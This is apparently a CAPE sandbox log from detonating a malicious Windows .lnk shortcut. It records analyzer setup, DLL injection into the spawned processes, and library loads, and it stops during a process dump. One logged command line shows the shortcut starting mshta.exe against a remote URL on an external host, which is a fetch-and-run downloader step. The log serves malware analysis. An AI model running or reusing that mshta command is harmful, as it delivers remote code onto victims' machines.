Analysis

Category Package Started Completed Duration
FILE lnk 2020-05-23 00:22:31 2020-05-23 00:26:43 252 seconds

Log

2020-05-13 09:13:31,032 [root] INFO: Date set to: 20200523T00:10:57, timeout set to: 200
2020-05-23 00:10:57,046 [root] DEBUG: Starting analyzer from: C:\tmpq_mrpfl7
2020-05-23 00:10:57,046 [root] DEBUG: Storing results at: C:\NduTvp
2020-05-23 00:10:57,046 [root] DEBUG: Pipe server name: \\.\PIPE\rdToedB
2020-05-23 00:10:57,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-05-23 00:10:57,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-05-23 00:10:57,046 [root] INFO: Automatically selected analysis package "lnk"
2020-05-23 00:10:57,046 [root] DEBUG: Trying to import analysis package "lnk"...
2020-05-23 00:10:57,062 [root] DEBUG: Imported analysis package "lnk".
2020-05-23 00:10:57,062 [root] DEBUG: Trying to initialize analysis package "lnk"...
2020-05-23 00:10:57,062 [root] DEBUG: Initialized analysis package "lnk".
2020-05-23 00:10:57,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-05-23 00:10:57,093 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-05-23 00:10:57,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-05-23 00:10:57,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-05-23 00:10:57,109 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-05-23 00:10:57,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-05-23 00:10:57,125 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-05-23 00:10:57,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-05-23 00:10:57,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-05-23 00:10:57,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-05-23 00:10:57,156 [lib.api.screenshot] DEBUG: Importing 'math'
2020-05-23 00:10:57,156 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-05-23 00:10:57,281 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-05-23 00:10:57,281 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-05-23 00:10:57,281 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-05-23 00:10:57,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-05-23 00:10:57,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-05-23 00:10:57,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-05-23 00:10:57,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-05-23 00:10:57,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-05-23 00:10:57,296 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-05-23 00:10:57,296 [root] DEBUG: Initialized auxiliary module "Browser".
2020-05-23 00:10:57,296 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-05-23 00:10:57,296 [root] DEBUG: Started auxiliary module Browser
2020-05-23 00:10:57,296 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-05-23 00:10:57,312 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-05-23 00:10:57,312 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-05-23 00:10:57,312 [root] DEBUG: Started auxiliary module Curtain
2020-05-23 00:10:57,312 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-05-23 00:10:57,312 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-05-23 00:10:57,312 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-05-23 00:10:57,312 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-05-23 00:10:57,656 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-05-23 00:10:57,656 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-05-23 00:10:57,671 [root] DEBUG: Started auxiliary module DigiSig
2020-05-23 00:10:57,671 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-05-23 00:10:57,671 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-05-23 00:10:57,671 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-05-23 00:10:57,703 [root] DEBUG: Started auxiliary module Disguise
2020-05-23 00:10:57,703 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-05-23 00:10:57,703 [root] DEBUG: Initialized auxiliary module "Human".
2020-05-23 00:10:57,703 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-05-23 00:10:57,703 [root] DEBUG: Started auxiliary module Human
2020-05-23 00:10:57,703 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-05-23 00:10:57,718 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-05-23 00:10:57,718 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-05-23 00:10:57,718 [root] DEBUG: Started auxiliary module Procmon
2020-05-23 00:10:57,718 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-05-23 00:10:57,718 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-05-23 00:10:57,718 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-05-23 00:10:57,718 [root] DEBUG: Started auxiliary module Screenshots
2020-05-23 00:10:57,718 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-05-23 00:10:57,718 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-05-23 00:10:57,718 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-05-23 00:10:57,734 [root] DEBUG: Started auxiliary module Sysmon
2020-05-23 00:10:57,734 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-05-23 00:10:57,734 [root] DEBUG: Initialized auxiliary module "Usage".
2020-05-23 00:10:57,734 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-05-23 00:10:57,734 [root] DEBUG: Started auxiliary module Usage
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL option
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL_64 option
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader option
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader_64 option
2020-05-23 00:10:57,765 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\cmd.exe" with arguments "/c start /wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk"" with pid 5152
2020-05-23 00:10:57,765 [lib.api.process] INFO: Monitor config for process 5152: C:\tmpq_mrpfl7\dll\5152.ini
2020-05-23 00:10:57,765 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpq_mrpfl7\dll\klphlro.dll, loader C:\tmpq_mrpfl7\bin\CMEGukf.exe
2020-05-23 00:10:57,812 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rdToedB.
2020-05-23 00:10:57,812 [root] DEBUG: Loader: Injecting process 5152 (thread 5092) with C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:10:57,812 [root] DEBUG: Process image base: 0x49FB0000
2020-05-23 00:10:57,812 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:10:57,812 [root] DEBUG: InjectDllViaIAT: Failed to allocate region in target process for new import table.
2020-05-23 00:10:57,828 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-05-23 00:10:57,906 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:10:57,921 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:10:57,937 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5152 at 0x6a450000, image base 0x49fb0000, stack from 0xa3000-0x1a0000
2020-05-23 00:10:57,937 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Windows\system32\cmd.exe" \c start \wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk".
2020-05-23 00:10:58,015 [root] INFO: loaded: b'5152'
2020-05-23 00:10:58,015 [root] INFO: Loaded monitor into process with pid 5152
2020-05-23 00:10:58,031 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-05-23 00:10:58,046 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-05-23 00:10:58,046 [root] DEBUG: Successfully injected DLL C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:00,062 [lib.api.process] INFO: Successfully resumed process with pid 5152
2020-05-23 00:11:00,109 [root] DEBUG: DLL loaded at 0x76AE0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2020-05-23 00:11:00,109 [root] DEBUG: DLL loaded at 0x74AC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:00,125 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:00,125 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-05-23 00:11:00,125 [root] DEBUG: DLL loaded at 0x76500000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:00,218 [root] DEBUG: DLL loaded at 0x76010000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:00,249 [root] DEBUG: DLL loaded at 0x74900000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-05-23 00:11:00,265 [root] DEBUG: DLL loaded at 0x761A0000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2020-05-23 00:11:00,281 [root] DEBUG: DLL loaded at 0x75BE0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-05-23 00:11:00,406 [root] DEBUG: DLL loaded at 0x75AE0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-05-23 00:11:00,421 [root] DEBUG: DLL loaded at 0x6ED80000: C:\Windows\System32\shdocvw (0x2f000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:00,453 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:00,468 [root] DEBUG: DLL unloaded from 0x76AE0000.
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x70B40000: C:\PROGRA~1\MICROS~3\Office14\GROOVEEX (0x406000 bytes).
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x71260000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90 (0xa3000 bytes).
2020-05-23 00:11:00,890 [root] DEBUG: DLL loaded at 0x711A0000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCP90 (0x8e000 bytes).
2020-05-23 00:11:00,890 [root] DEBUG: DLL loaded at 0x72410000: C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\ATL90 (0x2b000 bytes).
2020-05-23 00:11:00,890 [root] DEBUG: DLL loaded at 0x74790000: C:\Windows\system32\UxTheme (0x40000 bytes).
2020-05-23 00:11:00,906 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:00,921 [root] DEBUG: DLL loaded at 0x75390000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:00,937 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,937 [root] DEBUG: DLL unloaded from 0x704D0000.
2020-05-23 00:11:00,937 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x6EBE0000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x761F0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75C70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75CD0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75CE0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75C80000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75CC0000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x750B0000: C:\Windows\system32\version (0x9000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x75C60000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x75F50000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x779D0000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:01,062 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-05-23 00:11:01,078 [root] DEBUG: DLL loaded at 0x71990000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,093 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5120
2020-05-23 00:11:01,109 [lib.api.process] INFO: Monitor config for process 5120: C:\tmpq_mrpfl7\dll\5120.ini
2020-05-23 00:11:01,109 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpq_mrpfl7\dll\klphlro.dll, loader C:\tmpq_mrpfl7\bin\CMEGukf.exe
2020-05-23 00:11:01,125 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rdToedB.
2020-05-23 00:11:01,125 [root] DEBUG: Loader: Injecting process 5120 (thread 4020) with C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,125 [root] DEBUG: Process image base: 0x00CD0000
2020-05-23 00:11:01,125 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,125 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-05-23 00:11:01,125 [root] DEBUG: Successfully injected DLL C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5120
2020-05-23 00:11:01,171 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5120
2020-05-23 00:11:01,171 [lib.api.process] INFO: Monitor config for process 5120: C:\tmpq_mrpfl7\dll\5120.ini
2020-05-23 00:11:01,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpq_mrpfl7\dll\klphlro.dll, loader C:\tmpq_mrpfl7\bin\CMEGukf.exe
2020-05-23 00:11:01,187 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rdToedB.
2020-05-23 00:11:01,187 [root] DEBUG: Loader: Injecting process 5120 (thread 4020) with C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,203 [root] DEBUG: Process image base: 0x00CD0000
2020-05-23 00:11:01,203 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,203 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-05-23 00:11:01,203 [root] DEBUG: Successfully injected DLL C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,203 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5120
2020-05-23 00:11:01,203 [root] DEBUG: DLL loaded at 0x6BBE0000: C:\Windows\system32\sfc (0x3000 bytes).
2020-05-23 00:11:01,203 [root] DEBUG: DLL loaded at 0x6B880000: C:\Windows\system32\sfc_os (0xd000 bytes).
2020-05-23 00:11:01,218 [root] DEBUG: DLL unloaded from 0x6BBE0000.
2020-05-23 00:11:01,234 [root] DEBUG: DLL unloaded from 0x70B40000.
2020-05-23 00:11:01,249 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:11:01,249 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:11:01,249 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:01,249 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-05-23 00:11:01,249 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5120 at 0x6a450000, image base 0xcd0000, stack from 0x2d6000-0x2e0000
2020-05-23 00:11:01,249 [root] DEBUG: Commandline: C:\Windows\"C:\Windows\System32\msHta.Exe" http:\www.d01fa.net\images\D817583E\16364\11542\9f9d51bf\b0bdc66.
2020-05-23 00:11:01,265 [root] DEBUG: DLL unloaded from 0x761F0000.
2020-05-23 00:11:01,265 [root] INFO: loaded: b'5120'
2020-05-23 00:11:01,265 [root] INFO: Loaded monitor into process with pid 5120
2020-05-23 00:11:01,265 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\System32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:01,343 [root] DEBUG: DLL unloaded from 0x76AE0000.
2020-05-23 00:11:01,343 [root] DEBUG: DLL unloaded from 0x6ED80000.
2020-05-23 00:11:01,359 [root] DEBUG: DLL unloaded from 0x747E0000.
2020-05-23 00:11:01,375 [root] DEBUG: DLL unloaded from 0x76AE0000.
2020-05-23 00:11:01,500 [root] DEBUG: DLL loaded at 0x666B0000: C:\Windows\System32\mshtml (0x1062000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x75CD0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x75C70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x761F0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:01,531 [root] DEBUG: DLL loaded at 0x76010000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:01,531 [root] DEBUG: DLL loaded at 0x76500000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:01,546 [root] DEBUG: DLL loaded at 0x74790000: C:\Windows\System32\UxTheme (0x40000 bytes).
2020-05-23 00:11:01,546 [root] DEBUG: DLL loaded at 0x74AC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:01,546 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\System32\Secur32 (0x8000 bytes).
2020-05-23 00:11:01,562 [root] DEBUG: DLL loaded at 0x6C0A0000: C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,593 [root] DEBUG: DLL loaded at 0x76AE0000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-05-23 00:11:01,593 [root] DEBUG: DLL loaded at 0x75BE0000: C:\Windows\System32\profapi (0xb000 bytes).
2020-05-23 00:11:01,609 [root] DEBUG: DLL loaded at 0x71990000: C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x76750000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x77D80000: C:\Windows\system32\NSI (0x6000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x6F7C0000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x6F770000: C:\Windows\system32\webio (0x50000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL unloaded from 0x6F7C0000.
2020-05-23 00:11:01,640 [root] DEBUG: DLL loaded at 0x755C0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-05-23 00:11:01,656 [root] DEBUG: DLL loaded at 0x740A0000: C:\Windows\System32\IPHLPAPI (0x1c000 bytes).
2020-05-23 00:11:01,656 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\System32\WINNSI (0x7000 bytes).
2020-05-23 00:11:01,656 [root] DEBUG: DLL loaded at 0x755B0000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-05-23 00:11:01,671 [root] DEBUG: DLL loaded at 0x75480000: C:\Windows\System32\DNSAPI (0x44000 bytes).
2020-05-23 00:11:01,687 [root] DEBUG: DLL loaded at 0x71060000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-05-23 00:11:01,687 [root] DEBUG: DLL loaded at 0x74720000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x73F70000: C:\Windows\System32\dhcpcsvc6 (0xd000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x75140000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x6C300000: C:\Windows\System32\ieframe (0xaba000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x6C2F0000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,718 [root] DEBUG: DLL loaded at 0x73F50000: C:\Windows\System32\dhcpcsvc (0x12000 bytes).
2020-05-23 00:11:01,718 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\System32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:01,718 [root] DEBUG: DLL loaded at 0x72290000: C:\Windows\System32\rasadhlp (0x6000 bytes).
2020-05-23 00:11:01,734 [root] DEBUG: DLL loaded at 0x6B4F0000: C:\Windows\system32\msimtf (0xb000 bytes).
2020-05-23 00:11:01,734 [root] DEBUG: DLL loaded at 0x75390000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:01,734 [root] DEBUG: DLL loaded at 0x75BD0000: C:\Windows\System32\RpcRtRemote (0xe000 bytes).
2020-05-23 00:11:01,750 [root] DEBUG: DLL loaded at 0x735F0000: C:\Windows\System32\OLEACC (0x3c000 bytes).
2020-05-23 00:11:01,750 [root] DEBUG: DLL loaded at 0x6E540000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-05-23 00:11:01,765 [root] DEBUG: DLL loaded at 0x75B40000: C:\Windows\System32\SXS (0x5f000 bytes).
2020-05-23 00:11:16,000 [root] DEBUG: DLL loaded at 0x6E2C0000: C:\Windows\System32\msls31 (0x31000 bytes).
2020-05-23 00:11:16,015 [root] DEBUG: DLL loaded at 0x684A0000: C:\Windows\System32\d2d1 (0x347000 bytes).
2020-05-23 00:11:16,031 [root] DEBUG: DLL loaded at 0x6B5F0000: C:\Windows\System32\DWrite (0x136000 bytes).
2020-05-23 00:11:16,031 [root] DEBUG: DLL loaded at 0x71B90000: C:\Windows\System32\dxgi (0x4c000 bytes).
2020-05-23 00:11:16,046 [root] DEBUG: DLL loaded at 0x74140000: C:\Windows\System32\dwmapi (0x13000 bytes).
2020-05-23 00:11:16,046 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75E90000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75D60000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-05-23 00:11:16,078 [root] DEBUG: DLL loaded at 0x75C50000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-05-23 00:11:16,078 [root] DEBUG: DLL unloaded from 0x77830000.
2020-05-23 00:11:16,093 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,093 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,093 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,125 [root] DEBUG: DLL unloaded from 0x76600000.
2020-05-23 00:11:16,125 [root] DEBUG: DLL loaded at 0x719E0000: C:\Windows\System32\d3d11 (0x175000 bytes).
2020-05-23 00:11:16,125 [root] DEBUG: DLL loaded at 0x6B200000: C:\Windows\System32\D3D10Warp (0x1ea000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL unloaded from 0x77830000.
2020-05-23 00:11:16,171 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,171 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,171 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,203 [root] DEBUG: DLL unloaded from 0x76600000.
2020-05-23 00:11:16,203 [root] DEBUG: DLL unloaded from 0x6B200000.
2020-05-23 00:11:51,750 [root] DEBUG: DLL unloaded from 0x763A0000.
2020-05-23 00:14:20,062 [root] INFO: Analysis timeout hit, terminating analysis.
2020-05-23 00:14:20,062 [lib.api.process] INFO: Terminate event set for process 5152
2020-05-23 00:14:20,062 [root] DEBUG: Terminate Event: Attempting to dump process 5152
2020-05-23 00:14:20,062 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x49FB0000.
2020-05-23 00:14:20,078 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:20,078 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x49FB0000.
2020-05-23 00:14:20,078 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
